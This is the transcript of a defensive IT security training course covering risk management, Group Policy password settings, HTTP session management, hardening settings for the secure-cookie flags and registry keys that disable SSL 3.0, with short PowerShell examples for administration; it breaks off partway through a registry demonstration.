Cybersecurity 101: Session & Risk Management
A structured approach to security allows for the efficient management of security
controls. In this 13-video course, you will explore assets, threats, vulnerabilities,
risk management, user security and session management, data confidentiality, and
encryption. Key concepts covered in this course include how to identify, assess,
and prioritize risks; how to implement security controls to mitigate risk; and
how to perform account management actions that secure the environment. Next,
learn how to use Group Policy to implement user account hardening and configure
the appropriate password security settings for those accounts in accordance with
organizational security policies; learn how HTTP session management can affect
security; and observe how to harden web browsers and servers to use TLS
(transport layer security). Then learn how centralized mobile device control can
secure the environment; learn encryption techniques used to protect data; and
observe how to configure a virtual private network (VPN) to protect data in motion.
Finally, learn how to configure and implement file encryption to protect data at
rest; and how to configure encryption and session management settings.
Course Overview
[Video description begins] Topic title: Course Overview. Your host for this session
is Dan Lachance, an IT Consultant and Trainer. [Video description ends]
Dan Lachance has worked in various IT roles since 1993, including as a technical
trainer with Global Knowledge, a programmer, and a consultant, as well as an IT tech
author and editor for McGraw-Hill and Wiley Publishing. He has held and still
holds IT certifications in Linux, Novell, Lotus, CompTIA, and Microsoft.
His specialties over the years have included networking, IT security, cloud
solutions, Linux management and configuration and troubleshooting across a wide
array of Microsoft products. Most end users have a general sense of IT security
concepts, but today's IT systems are growing ever larger and more complex.
So now more than ever, it's imperative to have a clear understanding of what digital
assets are and how to deal with security threats and vulnerabilities. Users need to
acquire the skills and knowledge to apply security mitigations at the organizational
level. In this course, Dan Lachance will explore how a structured approach to
security allows for the efficient management of security controls. Specifically, he'll
cover risk management, user and session management, and encryption.
Assets, Threats, and Vulnerabilities
[Video description begins] Topic title: Assets, Threats, and Vulnerabilities. The
presenter is Dan Lachance. [Video description ends]
Today's IT systems are growing ever larger and more complex. And so it's
important to protect digital assets. IT security or cybersecurity is really based on
the protection of assets. We want to protect against threats that might render IT
systems unusable. We want to protect against the theft of intellectual property or
the theft of Personally Identifiable Information (PII), which includes things like
credit card numbers, street addresses, mother's maiden name. We want to protect
against the theft of Protected Health Information, PHI, which as the term implies, is
medically related information, medical insurance coverage, medical procedures
performed, and so on.
Digital assets have a perceived value to the organization. And it's critical that an
up-to-date inventory of these digital assets is maintained by the organization.
Because what might not have value at one point in time could have great value
down the road at a different point in time. Digital assets can include things like IT
systems, unique IT processes, programming code, and of course, data. This data,
again, might not have a perceived value immediately, but could down the road. For
example, data gathered about users' shopping habits might not have a lot of value
initially in the first quarter that it's gathered.
But after a few years, we start to be able to perform a trend analysis to see what
consumer shopping habits really turn out to be. And so they can have value down
the road, where it might not right now. IT vulnerabilities are weaknesses, and often
they are based on user error. User awareness and training is a great defense against
many security breaches, especially against social engineering or deceptive practices
by malicious users where they're trying to trick users into clicking a link or
supplying sensitive information over the phone, or opening a file attachment in an
email.
We also have to consider vulnerabilities related to products that get shipped with
default settings that aren't secure. Things like home wireless routers are a great
example where the default username and password might be in place. And unless
the user changes it, it's still in effect even when it's plugged in at a user's home. And
as a result, it doesn't take very much to determine what the default credentials are to
hack into that type of a system. With today's proliferation of Internet of Things, or
IoT, devices, the category essentially includes pretty much anything that can connect to
the Internet, such as home automation systems, baby monitors, smart cards, and so
on.
The problem with a lot of these is that they're designed to be simple to use, and as a
result, don't have a lot of security built in. And in some cases, the firmware within
these IoT devices isn't even updateable. Other vulnerabilities can come in the form
of configuration flaws. An example of this could be hosts or entire networks that
aren't hardened. Hardening means we're reducing the attack surface. In other words,
we're trying to lock down a system or a network environment, perhaps by patching
it, by removing unnecessary services, maybe by putting it on a protected network,
and so on.
Examples of IT threats would include Denial of Service or DoS attacks, and its
counterpart, Distributed Denial of Service, or DDoS attacks, which includes a
number of machines. It could be dozens, hundreds, or even thousands under
centralized control of a malicious user. The malicious user can then send
instructions to that collection of machines under his or her control, which is called a
zombie net or a botnet. And then those bots, or zombies can then go out and
perhaps, flood a victim network with useless traffic.
And therefore, it's Denial of Service for legitimate users of that service. Other
threats, of course, include malware, whether it's things like spyware or worms. There
have been a lot of cases of ransomware over the last few years that might encrypt
sensitive data files. And if you don't provide a Bitcoin payment, you won't receive a
decryption key. And often, there is no guarantee that you will receive the key
anyway even if you do submit this untraceable Bitcoin payment.
Other IT threats include data loss, whether it's intentional or unintentional, such as
a user mistakenly sending a sensitive email file attachment to people outside of the
company. Then we have security controls that are put in place to mitigate threats,
but then over time, might not be as secure as they were initially. Now, examples of
security controls that can mitigate threats would include the encryption of data at
rest using an encryption solution, such as those built into operating systems like
Microsoft BitLocker or Microsoft Encrypting File System.
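As a quick illustration of a data-at-rest control like the ones just mentioned, here is a minimal PowerShell sketch for turning on BitLocker. It assumes a Windows edition that includes BitLocker and its PowerShell module; the drive letter and encryption method are illustrative choices, not settings prescribed by the course.

    # Minimal sketch (run as Administrator): encrypt the C: volume with BitLocker,
    # adding a recovery password protector so the volume can be recovered later.
    Enable-BitLocker -MountPoint 'C:' `
                     -EncryptionMethod XtsAes256 `
                     -RecoveryPasswordProtector `
                     -UsedSpaceOnly

    # Check encryption status and progress:
    Get-BitLockerVolume -MountPoint 'C:'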
Risk Management
[Video description begins] Topic title: Risk Management. The presenter is Dan
Lachance. [Video description ends]
Risk management is an important part of cybersecurity. It relates to the protection
of digital assets like IT systems, and the data that they produce and process. Any
business endeavor will always have some kind of potential threats. The key is to
properly manage the risk against those digital assets. So, we have to have
acceptable security controls in place to protect assets, at a reasonable cost. Risk
management first begins with the identification of both on-premises and cloud
assets. This would include things like personnel. Nothing is more important than
people.
Followed by things like business processes that might be unique within the
industry. IT systems and data. We also have to consider data privacy laws and
regulations that might need to be complied with, in the protection of these IT
systems and data. Next we need to identify threats against the assets. So threats
against personnel safety, or data theft, or systems being brought down. So that
would result in system down time which certainly has a cost associated with it. We
then need to determine the likelihood that these threats would actually occur, so we
need to prioritize the threats.
This way, we are focusing our energy and our resources on what is most likely to
happen, which makes sense. So what are some examples of potential threats? Well,
any threat that is going to have a negative business impact, such as an e-commerce
web site being down for a number of hours. Which means that we can't sell our
products or services if that site is down. When we say that site, we're normally
referring to a farm of servers sitting behind a load balancer in most cases. We might
also experience a power outage. That is also another type of threat, or a hardware
failure.
There could be a software failure within the operating system. Or a driver within
the operating system can cause a failure or a malfunction of some kind. Of course,
we also have to consider malware infections as a realistic threat. Or the system
being compromised by a malicious user, which then means they could steal data.
Or they might use it for Bitcoin mining, which would slow down our system. Of
course, there are always natural disasters, like floods or fires or bad weather that
can cause problems and result in downtime. Of course, there are then man-made
disasters such as arson, fires set on purpose, or terrorist attacks or anything of that
nature.
[Video description begins] Risk Prioritization. [Video description ends]
So the next thing is to prioritize the risks and categorize them via a risk registry.
Which is essentially a centralized document that will show all of the risks, and how
they are categorized or prioritized. So we might determine then that software
failure is the most likely threat, followed by hardware failure, maybe followed by
power outages, malware infections, natural disasters, and finally man-made
disasters. This could be based on regional history where our premises are located,
as well as past incidents that might have occurred in our environment.
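To make the idea of a prioritized risk registry concrete, here is a small, hypothetical PowerShell sketch. The risk names follow the ordering above, but the likelihood scale and scores are illustrative assumptions only, not values taken from the course.

    # Hypothetical risk registry entries with a 1-6 likelihood score,
    # sorted so the most likely threats appear first.
    $riskRegistry = @(
        [pscustomobject]@{ Risk = 'Software failure';  Likelihood = 6 }
        [pscustomobject]@{ Risk = 'Hardware failure';  Likelihood = 5 }
        [pscustomobject]@{ Risk = 'Power outage';      Likelihood = 4 }
        [pscustomobject]@{ Risk = 'Malware infection'; Likelihood = 3 }
        [pscustomobject]@{ Risk = 'Natural disaster';  Likelihood = 2 }
        [pscustomobject]@{ Risk = 'Man-made disaster'; Likelihood = 1 }
    )
    $riskRegistry | Sort-Object Likelihood -Descending | Format-Table -AutoSize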
[Video description begins] Risk Management. [Video description ends]
The next thing to consider is to implement cost-effective security controls. A
security control is put in place to reduce the impact of a threat. And we have to
make sure that the risk is accepted in order for this to happen in the first place. If
we choose not to engage in a specific activity because it's too risky, well then, if
we're not engaging in that activity, there is no need to implement a security control.
We always have to think about legal and regulatory compliance regarding security
controls.
For example, if we're in the retail business dealing with credit cards and debit
cards, then the PCI DSS standard applies, which affects merchants dealing with
cardholder data. We would have to take a look at how we would protect assets such as
customer card information, whether we encrypt network traffic or encrypt data at
rest. And often a lot of these standards will state that data must be protected, but
won't specify exactly what should be used to do it.
Often, that is left up to the implementers. It's important to always monitor the
effectiveness of implemented security controls via periodic security control
reviews. Just like digital assets over time can increase in value, in the same way our
implemented security controls can be reduced in terms of their effectiveness at
mitigating a threat. So it's always important to monitor these things over time.
Map Risks to Risk Treatments
[Video description begins] Topic title: Map Risks to Risk Treatments. The presenter
is Dan Lachance. [Video description ends]
Securing IT resources means proper risk management. Proper risk management
means mapping risks to risk treatments. Risk treatments include things like risk
acceptance, risk avoidance, risk transfer, and risk mitigation. We're going to talk
about each of these. We're going to start with risk acceptance. With risk
acceptance, we are not implementing any type of specific security control to
mitigate the risk, because the likelihood of that threat being realized is so low
that it doesn't require it. And should that threat materialize, the negative impact to
the business might also be very low.
And so we accept the risk as it is in engaging in that particular activity. Some
potential examples of this include the hiring of new employees. Now performing
our due diligence with background checks before hiring might be considered a
separate activity from the actual hiring itself, which is why hiring new
employees might not require any types of security controls. Company mergers and
acquisitions can also fall under this umbrella. Under the presumption that
organizations have already done their due diligence to manage risk appropriately in
their own environments. Using software that is known to have unpatched
vulnerabilities, yet we still choose to use that software in an unpatched state.
Well, we might do that because the possibility of that threat being realized is so
low. Risk avoidance is related to risks that introduce way too high of a possibility
of occurrence beyond the organization's appetite for risk. So what we're doing with
risk avoidance then is we are removing the risk, because we are not engaging in the
activity that introduces that high level of risk. As an example, we might stop using
a currently deployed operating system, such as Windows XP, because there are too
many vulnerabilities now. Maybe there weren't initially, but there are now.
And so we're going to upgrade to a newer secure version. Now, in one aspect, we
are avoiding the risk because we are no longer using Windows XP. But at the same
time, you could argue that we might be mitigating the risk by upgrading to a new
version of Windows, such as Windows 10. So it really depends on your
perspective. Risk transfer essentially means that we are outsourcing responsibility
to a third party. An example of this these days is cyber liability insurance
related to security breaches, where the monthly premiums can actually be reduced
if you can demonstrate that you've got deployed security controls that are effective
in mitigating risks.
It can relate to online financial transactions, customer data storage, medical patient
data storage. Also, if we decide to outsource some on-premises IT solutions to the
public cloud, to a degree, there is risk transfer. Because we have service level
agreements or SLA contracts with cloud providers that guarantee specific levels of
uptime for the use of some different cloud services. Bear in mind that the variety of
cloud services available out there is large and each one of them has a different SLA
or service level agreement.
Risk mitigation means that we are applying a security control to reduce the impact
if the risk is realized. An example of this would be firewall rules that block all
incoming connections initiated from the Internet. And this might be required by
organizational security policies, by laws, and by regulations. So it's important, then,
that we apply the appropriate risk treatment, given that we have an understanding
of the risk associated with engaging in specific activities.
User Account Management
[Video description begins] Topic title: User Account Management. The presenter is
Dan Lachance. [Video description ends]
User account management is a crucial part of cybersecurity. It's important that it
should be done correctly because if user accounts are not managed correctly, if
they're not secured properly, malicious users could gain access to user accounts,
which could ultimately lead to the compromise of a sensitive system and its data.
[Video description begins] User Account Management. [Video description ends]
User accounts can be managed manually. Usually this is in the form of a GUI, a
graphical user interface where administrators can click and drag and work with user
accounts. You might imagine doing this in a Microsoft Active Directory
environment using the Microsoft Active Directory Users and Computers GUI tool.
But user account management can also be automated. For example, technicians
might build a Microsoft PowerShell script to check for users that haven't logged on
for more than 90 days. Or, in a UNIX or Linux environment, a Shell script might be
written.
Looking for user accounts that have read and write permissions to the file system.
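A hedged sketch of the kind of PowerShell automation just described might look like the following. It assumes the ActiveDirectory module is available on the machine running it; the 90-day threshold matches the example above.

    # Minimal sketch: list enabled AD user accounts that have not logged on
    # in more than 90 days (LastLogonDate is only approximately replicated).
    Import-Module ActiveDirectory
    $cutoff = (Get-Date).AddDays(-90)
    Get-ADUser -Filter 'Enabled -eq $true' -Properties LastLogonDate |
        Where-Object { $_.LastLogonDate -lt $cutoff } |
        Select-Object Name, SamAccountName, LastLogonDate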
We can also have centralized management solutions in an enterprise that can be
used to push out settings related to user accounts. Especially those related to
password strength. It's important that every user have their own unique user
account and that we don't have any shared logins. This way we have accountability
when we start auditing usage. If we audit usage of a shared account and we realize
that in the middle of the night, Saturday night, someone is doing something they
shouldn't be doing to a database, we have no way of really knowing who it is, if
that account is a shared account.
So keep unique user accounts in place. Also we want to make sure we adhere to the
principle of least privilege. This is easier said than done because it's very
inconvenient, as is usually the case with anything that means better security. What
this means is that we want to grant only the permissions that are required to
perform a task, whether it's to a user, to a group, to a service account. Now this
requires more effort because we might have to give specific privileges to other
specific resources for that account, so it takes more time.
But the last thing you want to do for example in a Windows environment is simply
add a user to the administrator's group on a local Windows machine, just to make
sure they have rights to do whatever they need to do. Not a great idea. The next
thing would be password settings, which we mentioned could be managed
centrally. Such as through tools like Microsoft Group Policy where we can set a
minimum password length, password expiration dates, whether or not passwords
can be reused.
Multifactor authentication is crucial when it comes to user account management,
instead of the standard username and password alone, which constitutes something you
know; even though it's two items, that is single-factor authentication. Multifactor
authentication uses factors from different categories, like something you
know and something you have. A great example of this, and it's prevalent out
there, is when you sign into a Google account: you'll have to know
a username and a password, and then Google will send an authentication code to
your smartphone.
And so, you then have to specify that code as well. You have to have that
smartphone as well as knowledge of the username and password to be able to sign
in successfully. User accounts should also have expiry dates when applicable. An
example of this would be hiring co-op students that are finishing their studies and
need some work-term experience. So we might want to set an expiry on those
accounts where we know that they have a limited lifetime. It's important to audit,
not only user account usage but also the file system, networks, servers, access to
data such as in databases.
All of this can be tied back to user accounts. But we want to make sure
that we are selective in which users we choose to audit and
which actions for each user. Because otherwise it could result in audit alert message
fatigue, if you're always getting audit messages about someone opening a file.
Maybe that is not relevant. So we need to think carefully about how to configure
our auditing as it relates to users.
Deploy User Account Security Settings
[Video description begins] Topic title: Deploy User Account Security Settings. The
presenter is Dan Lachance. [Video description ends]
One way to harden user accounts is to configure the appropriate password security
settings for those accounts in accordance with organizational security policies. If
you're a Microsoft shop, you might use a Microsoft Active Directory Domain that
computers are joined to so they can pull down central settings from Group Policy,
such as security settings. That is exactly what I'm going to do here in Windows
Server 2016.
Let me go over to my Start menu and fire up the Group Policy Management tool.
Now this is a tool that can also be installed on workstations. You don't have to do it
on the server, but it will be present automatically on servers that are configured as
Microsoft Active Directory Domain controllers. When I fire up Group Policy, I get
to specify the Group Policy Object or the GPO in which I want to configure the
settings.
[Video description begins] The Group Policy Management window opens. The
window is divided into three parts. The first part is the toolbar. The second part is
the navigation pane. It contains the Group Policy Management root node which
contains the Forest: fakedomain1.local node, which further contains Domains and
Sites subnodes, Group Policy Modeling and Group Policy Results options. The
Domains subnode includes fakedomain1.local, Admins, and Domain Controllers
subnodes. The fakedomain1.local subnode is expanded and it contains the Default
Domain Policy option. The Default Domain Policy option is selected and open in
the third part. It contains four tabs: Scope, Details, Settings, and Delegation. The
Scope tab is selected. It is further divided into three sections. The first section is
Links, which contains the Display links in this location drop-down list box and a
table with Location, Enforced, Link Enabled, and Path column headers and one
row. The values fakedomain1.local, No, Yes, and fakedomain1.local are displayed
under the Location, Enforced, Link Enabled, and Path column headers,
respectively. The second section is Security Filtering. It includes a table with Name
column header and one row, with the value Authenticated Users. It also includes
three buttons: Add, Remove, and Properties. The third section is WMI Filtering. It
contains a drop down list box and Open button. [Video description ends]
Every Active Directory Domain has what is called a Default Domain Policy.
[Video description begins] He points to the Default Domain Policy option. [Video
description ends]
That is a GPO, a Group Policy Object, and notice that hierarchically, it's indented
directly under my Active Directory Domain.
[Video description begins] He points to the fakedomain1.local subnode. [Video
description ends]
So therefore, the settings in this Default Domain Policy will apply to all users and
computers in the entire Active Directory Domain by default, unless it's configured
otherwise, but that is the default behavior. So if you're going to configure password
settings in Active Directory using Group Policy, you have to configure them in the
Default Domain Policy.
Other GPOs that you might link with specific organizational units that contain
users and computers like Chicago or Boston or LasVegas, while you can configure
other settings that can apply to just those hierarchical levels of AD, Active
Directory, password settings won't work.
[Video description begins] He points to these options under the fakedomain1.local
subnode. [Video description ends]
You've got to do it in the Default Domain Policy because, well, that is just the way
it is. So I'm going to go ahead and right-click on the Default Domain Policy and
choose Edit. You'll find that the bulk of security settings are not at the User
Configuration level but rather at the Computer Configuration level. So under
Computer Configuration, I'm going to drill down under Policies, and then I'm going
to go down under Windows Settings.
[Video description begins] The Group Policy Management Editor window opens. It
is divided into three parts. The first part is the toolbar. The second part is the
navigation pane. It contains the Default Domain Policy [SRV2016-1.FAKEDOMAIN1.LOCAL] Policy root node, which contains two nodes, Computer
Configuration and User Configuration. The Computer Configuration node contains
the Policies and Preferences subnodes. The User Configuration node contains the
Policies and Preferences subnodes. The third part contains two tabs, Extended and
Standard. [Video description ends]
After that opens up, I'll then be able to drill down and see all of the security settings
that are configurable.
[Video description begins] The Windows Settings subnode includes the Name
Resolution Policy, Deployed Printers, and Security Settings subnodes. [Video
description ends]
So I'll expand Security Settings and we'll see all kinds of great stuff here including
Account Policies. So I’ll drill down under that, and I'm going to click on the
Password Policy.
[Video description begins] The Security Settings subnode includes the Account
Policies, Local Policies, and Event Log subnodes. He expands the Account Policies
subnode and it contains Password Policy, Account Lockout Policy, and Kerberos
Policy subnodes. He clicks the Password Policy subnode and a table is displayed in
the third part of the window. The table contains two columns and six rows. The
column headers are Policy and Policy Setting. The Policy column header includes
the Enforce password history, Minimum password age, and Minimum password
length values. [Video description ends]
Over on the right, I can determine the password settings I want applied at this
domain level which will apply to all the users and computers in the domain by
default. Now it might take an hour and a half, two hours, three hours depending on
your environment and how it's set up.
It's not going to be immediate once you configure it, but these settings will be put
into effect. So what I'm going to do here, is start with the Minimum password
length, which is currently set at 0 characters, that is terrible. So I'm going to go
ahead and double-click on that, and I'm going to say that it needs to be a minimum
of 16 or 14 characters.
[Video description begins] The Minimum password length Properties dialog box
opens. It contains two tabs: Security Policy Setting and Explain. The Security
Policy Setting tab is selected. It includes a Define this policy setting checkbox and
No password required spin box. It also includes OK, Cancel, and Apply buttons.
The Define this policy setting checkbox is selected. [Video description ends]
Now, if I try to go beyond 14, it maxes out.
[Video description begins] He enters the value 14 in the No password required spin
box. The name of the spin box changes from No password required to Password
must be at least. [Video description ends]
Now depending on add-on extensions you might have installed, other additional
products besides just what you get with Active Directory, you'll have different
settings that you can apply here. So here, I'm going to have to be happy with 14
character passwords. Your users won't be happy, but that doesn't matter, the
environment will be more secure.
[Video description begins] He clicks the OK button and the Minimum password
length Properties dialog box closes. [Video description ends]
The next thing I can do is turn on password complexity. Now, that is already turned
on, which means we don't want to allow simple passwords to be used.
[Video description begins] He double-clicks the Password must meet complexity
requirements value and the Password must meet complexity requirements
Properties dialog box opens. It contains two tabs: Security Policy Setting and
Explain. The Security Policy Setting tab is selected. It contains Define this policy
setting checkbox and two radio buttons, Enabled and Disabled. Define this policy
setting checkbox and Enabled radio button are selected. [Video description ends]
In other words, we want to be able to use a mixture of upper and lowercase letters
and symbols and so on. When you're configuring Group Policy, notice that you'll
always have an Explain tab at the top so you can see what that specific setting will
do. And here we see what the password complexity settings entail. So we've got
that setting, that is fine, it was already done.
[Video description begins] He clicks the OK button and the Password must meet
complexity requirements Properties dialog box closes. [Video description ends]
I'm also going to set a Minimum password age here to 5 days.
[Video description begins] He double-clicks the Minimum password age value and
the Minimum password age Properties dialog box opens. It includes a Define this
policy setting checkbox and Password can be changed immediately spin box. It also
includes OK, Cancel, and Apply buttons. The Define this policy setting checkbox is
selected. [Video description ends]
Because as soon as a user is forced to change a password, I don't want them to go
and change it right away to something else that they know that is easier to use.
[Video description begins] He enters the value 5 in the Password can be changed
immediately spin box and the name of the spin box changes to Password can be
changed after:. [Video description ends]
I'm also going to set a Maximum password age in accordance with organizational
security policies.
[Video description begins] He clicks the OK button and the Minimum password
age Properties dialog box closes. He double-clicks the Maximum password age
value and the Maximum password age Properties dialog box opens. It includes a
Define this policy setting checkbox and Password will not expire spin box. It also
includes OK, Cancel, and Apply buttons. The Define this policy setting checkbox is
selected. [Video description ends]
Maybe every 30 days, this needs to be changed.
[Video description begins] He enters the value 30 in the Password will not expire
spin box and the name of the spin box changes to Password will expire in. He clicks
the OK button and the Maximum password age Properties dialog box
closes. [Video description ends]
I can also Enforce password history so people can't keep reusing the same
passwords. Maybe it will remember the last eight passwords.
[Video description begins] He double-clicks the Enforce password history value
and the Enforce password history Properties dialog box opens. It includes a Define
this policy setting checkbox and Do not keep password history spin box. It also
includes OK, Cancel, and Apply buttons. The Define this policy setting checkbox is
selected. He enters the value 8 in the Keep password history spin box and the name
changes to Keep password history for:. He clicks the OK button and the dialog box
closes. [Video description ends]
So all of these settings are now saved into Group Policy within the Default Domain
Policy. So what this means is as machines refresh Group Policy, which they do
automatically by default, approximately every 60 to 90 minutes, then they will see
this change, and it will be put into effect.
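For reference, similar domain-wide password requirements can also be set from PowerShell on a domain controller. This is a minimal sketch, assuming the ActiveDirectory module and the fakedomain1.local domain from the demo; it adjusts the default domain password policy directly rather than editing the GPO in the console, and the values mirror the ones configured above.

    # Minimal sketch: apply the password settings shown in the demo.
    Set-ADDefaultDomainPasswordPolicy -Identity fakedomain1.local `
        -MinPasswordLength 14 `
        -ComplexityEnabled $true `
        -MinPasswordAge (New-TimeSpan -Days 5) `
        -MaxPasswordAge (New-TimeSpan -Days 30) `
        -PasswordHistoryCount 8

    # Force an immediate Group Policy refresh on a client instead of waiting
    # for the normal background refresh cycle:
    gpupdate /force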
HTTP Session Management
[Video description begins] Topic title: HTTP Session Management. The presenter
is Dan Lachance. [Video description ends]
HTTP stands for HyperText Transfer Protocol. It's the protocol that is used between
a web browser and a web server as they communicate back and forth. The secured
version of it is HTTPS, which can use SSL or ideally TLS, Transport Layer
Security, to secure that communication. HTTP/1.0 is considered stateless. What
this means is that, after the web browser makes a request to the web server and the
web server services it, the communication stops, the session isn't retained.
[Video description begins] Communication stops upon HTTP transaction
completion. [Video description ends]
And so the way that we get around this is by using web browser cookies. These are
small files on the client web browser machine that can retain information.
Preferences for a user for a web site, things like the preferred language, but also
session state information between invocations of HTTP requests. So it might have a
session ID that is encrypted after the user successfully authenticates to a secured
web site.
And that would be in the form of a security token, then that cookie data, such as the
token, can then be submitted to web servers for future transactions. Now, there is
usually a timeout involved with this, and you might be familiar with this if you've
ever conducted online banking. After you authenticate to online banking, for a few
minutes you can continue doing your online banking without having to
reauthenticate. But if you step away from your station for a few minutes and don't
log out, when you come back you'll have to reauthenticate. So usually this cookie
data has a specific lifetime.
HTTP/2 does support what are called persistent HTTP connections. Also they're
called HTTP TCP connection reuse settings or HTTP keep-alive, which is enabled
through an HTTP header. All of this really means the same thing. It means that
instead of having a single connection between a web browser and a web server that
terminates after the server services the request, we have the connection that isn't
always treated like it's new every time the web browser sends a request to the
server.
[Video description begins] Programmatic session management. [Video description
ends]
So this can also be done programmatically. Developers can use language and
platform-specific APIs, so if they're working in Tomcat Java servlets, for example,
where they can enable HTTP session management. So what we're really doing is
taking a bunch of network communications between the browser and the server and
treating it as the same session. So, this can be done using HTTP session IDs, and
again, this is what you'll often see cookies used for, for secured web sites.
So this way, it allows the web server to track sessions from the client across
multiple HTTP requests. Because as we know, generally speaking, certainly in the
case of HTTP/1.0, it is considered stateless or connectionless. So the session ID,
where could this be stored? Well, it could actually be stored in a form field on a
web form. It might even be a hidden field. Often it's stored in a cookie. It could also
be embedded within a URL, and when it is, that is called URL rewriting.
HTTP session IDs must not be predictable in order for the use of them to be
considered secure. So they shouldn't be sequential, and they shouldn't be
predictable by using some kind of a mathematical formula to always predict the
next value that is going to be used for a session ID. Now, remember that the way
session IDs are used is after a user has successfully authenticated to a site, a web
application. In the future during that session, the client will send the session ID to
identify its authenticated state so that the server knows it's authorized to do things.
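As an illustration of what a non-predictable session ID involves, here is a minimal PowerShell sketch that builds a token from a cryptographically secure random number generator; the 32-byte length is an illustrative assumption, not a value from the course.

    # Generate a 32-byte cryptographically random value and encode it
    # for use as a session identifier.
    $rng   = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $bytes = New-Object byte[] 32
    $rng.GetBytes($bytes)
    $sessionId = [Convert]::ToBase64String($bytes)
    $sessionId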
So the server then can maintain session information for that specific ID. The other
consideration to watch out for is HTTP session hijacking, also called cookie
hijacking.
What happens is attackers can take over an established active HTTP session. They
need the session ID, which could be stored in a cookie. So imagine that somehow
we manage to trick a user into clicking a link on a malicious web site that executes
some JavaScript on the client machine in the web browser. Now, when JavaScript
executes in a web browser, it is limited in terms of what it can do. But one of the
things it will be able to do is to take a look at any cookies and send them along to a
server.
So if a user's browser session is compromised and they've already got an
authenticated connection, then there is a possibility that we could have some
tampering take place where that session ID could be replayed or sent out to perform
malicious acts. Such as depositing money into an anonymous account or sending it
through Bitcoin over the Internet that the attacker would have access to. So as we
know, session IDs should never be predictable, otherwise, they are really susceptible
to session hijacking. So how could this session hijacking occur?
We've already identified that it could be client-side malicious web browser scripts
that the user is somehow tricked into executing. Such as, visiting a web site that has
some JavaScript on it. It could also be malware that runs within the operating
system, which might not be sandboxed to just the web browser session itself.
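One common way to reduce the script-based cookie theft just described is to flag the session cookie so browser scripts cannot read it and so it only travels over HTTPS. The following is a hedged example of a server response header; the cookie name, value, and lifetime are hypothetical:

    Set-Cookie: sessionid=7f9c2ba4e88f827d616045507605853e; Path=/; Secure; HttpOnly; SameSite=Strict; Max-Age=900

HttpOnly blocks access from JavaScript's document.cookie, Secure restricts the cookie to HTTPS, SameSite limits cross-site sending, and Max-Age bounds the session lifetime mentioned earlier.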
Another aspect of HTTP session management is to disable SSL, Secure Sockets
Layer, on clients and on servers.
[Video description begins] Disable SSL on Clients and Servers. [Video description
ends]
In the screenshot, in the Windows environment, we've got some advanced Internet
settings where we have the option of making sure that SSL or Secure Sockets
Layer, is not enabled, which is the case here in the screenshot.
[Video description begins] A screenshot of Internet Properties dialog box is
displayed. It includes the General, Security, Content, and Advanced tabs. The
Advanced tab is selected. It consists of the Settings section and the Restore
advanced settings button. The Settings section includes the Use SSL 3.0, Use TLS
1.0, Use TLS 1.1, and Use TLS 1.2 checkboxes. The Use TLS 1.0, Use TLS 1.1, and
Use TLS 1.2 checkboxes are selected. [Video description ends]
Even SSL version 3, the last version of SSL, is not considered secure. There are
known vulnerabilities, and it's really a deprecated protocol. So we should be using,
where possible, the newest version of TLS, Transport Layer Security, which
supersedes SSL. There are even vulnerabilities with TLS 1.0, so even it shouldn't
be used. But remember, here we're seeing settings on the client side; the server
side also needs to be configured for it. Now, you might wonder, why is there any
SSL 3.0 or TLS 1.0 still out there? Backwards compatibility with older browsers or
older software, but ideally, SSL should not be used at all in this day and age.
Configure SSL and TLS Settings
[Video description begins] Topic title: Configure SSL and TLS Settings. The
presenter is Dan Lachance. [Video description ends]
In this demonstration, I'll be configuring SSL and TLS settings. SSL and TLS are
protocols that are used to secure a connection given a PKI certificate. So there is
really no such thing as an SSL certificate or a TLS certificate even though people
call it that. It's not specified that we have to use SSL with a given certificate or
TLS. So the same certificate can be used for both or for either. So let's start here on
a Microsoft IIS web server. The first thing I'm going to do on my server is go into
the registry editor. So I'm going to start regedit.
[Video description begins] The Registry Editor window opens. It is divided into two
parts. The first part is the navigation pane and the second part is the content pane.
The navigation pane contains the Computer root node which includes
HKEY_CLASSES_ROOT, HKEY_CURRENT_USER, and
HKEY_LOCAL_MACHINE nodes. The HKEY_LOCAL_MACHINE node is
expanded and it includes HARDWARE, SECURITY, and SYSTEM subnodes. The
SYSTEM subnode is expanded and it includes ActivationBroker and
CurrentControlSet subnodes. The CurrentControlSet subnode is expanded and it
includes Control subnode. The Control subnode is expanded and it includes
SecurityProviders subnode. The SecurityProviders subnode is expanded and it
includes SaslProfiles and SCHANNEL subnodes. The SCHANNEL subnode is
expanded and it includes Ciphers and Protocols subnodes. The Protocols subnode
is expanded and it contains SSL 2.0 subnode. The SSL 2.0 subnode further contains
Client subnode. The second part contains a table with Name, Type, and Data
column headers. [Video description ends]
And here in regedit, I've already navigated to HKEY_LOCAL_MACHINE,
SYSTEM, CurrentControlSet, Control. Then what I want to do is go all the way
down to SecurityProviders, SCHANNEL, Protocols. And here we see, for example,
SSL version 2.0 is listed here. However, we can add entries here to determine, for
instance, whether we want to disable SSL version 3.
[Video description begins] He points to the Protocols subnode. [Video description
ends]
And that is definitely something that we want to be able to do. SSL 3 has a lot of
known vulnerabilities, and as such, it's considered deprecated. So we really should
be disabling it on the server. So to do that, here under Protocols, I'm going to build
some new items. I'm going to right-click on Protocols, choose New > Key and I'm
going to call it SSL 3.0. Under which, I'll then create another key and it's going to
be called Server, because we're configuring the server aspect of it.
[Video description begins] He right-clicks the SSL 3.0 folder and a shortcut menu
appears which includes the New option. He hovers over the New option and a
flyout menu appears. It includes Key, String Value and Binary Value
options. [Video description ends]
And then I'm going to configure a DWORD value here under Server, so I'll right-click on that, New > DWORD (32-bit) Value.
[Video description begins] He selects the Key option. A new folder appears under
the SSL 3.0 folder and he names it Server. [Video description ends]
And this one is going to be called DisabledByDefault.
[Video description begins] He right-clicks the Server folder and a shortcut menu
appears. He hovers over the New option and a flyout menu appears. He clicks the
DWORD (32-bit) Value option. A new row appears. The values REG_DWORD and
0x00000000 (0) appear under the Type and Data column headers. He enters the
value DisabledByDefault under the Name column header. The Edit DWORD (32-bit) Value dialog box opens. It includes Value name and Value data text boxes. It
includes Base section with two radio buttons, Hexadecimal and Decimal and OK
and Cancel buttons. The value DisabledByDefault is displayed in the Value name
text box and the Hexadecimal radio button is selected. [Video description ends]
And I'm going to set that to a value of 1.
[Video description begins] He enters the value 1 in the Value data text box and
clicks the OK button and the Edit DWORD (32-bit) Value dialog box closes. The
value under the Data column header changes from 0x00000000 (0) to 0x00000001
(1). [Video description ends]
And I'm going to add another item here, I'll build another new DWORD value. This
one is going to be called Enabled and we're going to leave that at a value of 0.
[Video description begins] He right-clicks the Server folder and a shortcut menu
appears. He hovers over the New option and a flyout menu appears. He clicks the
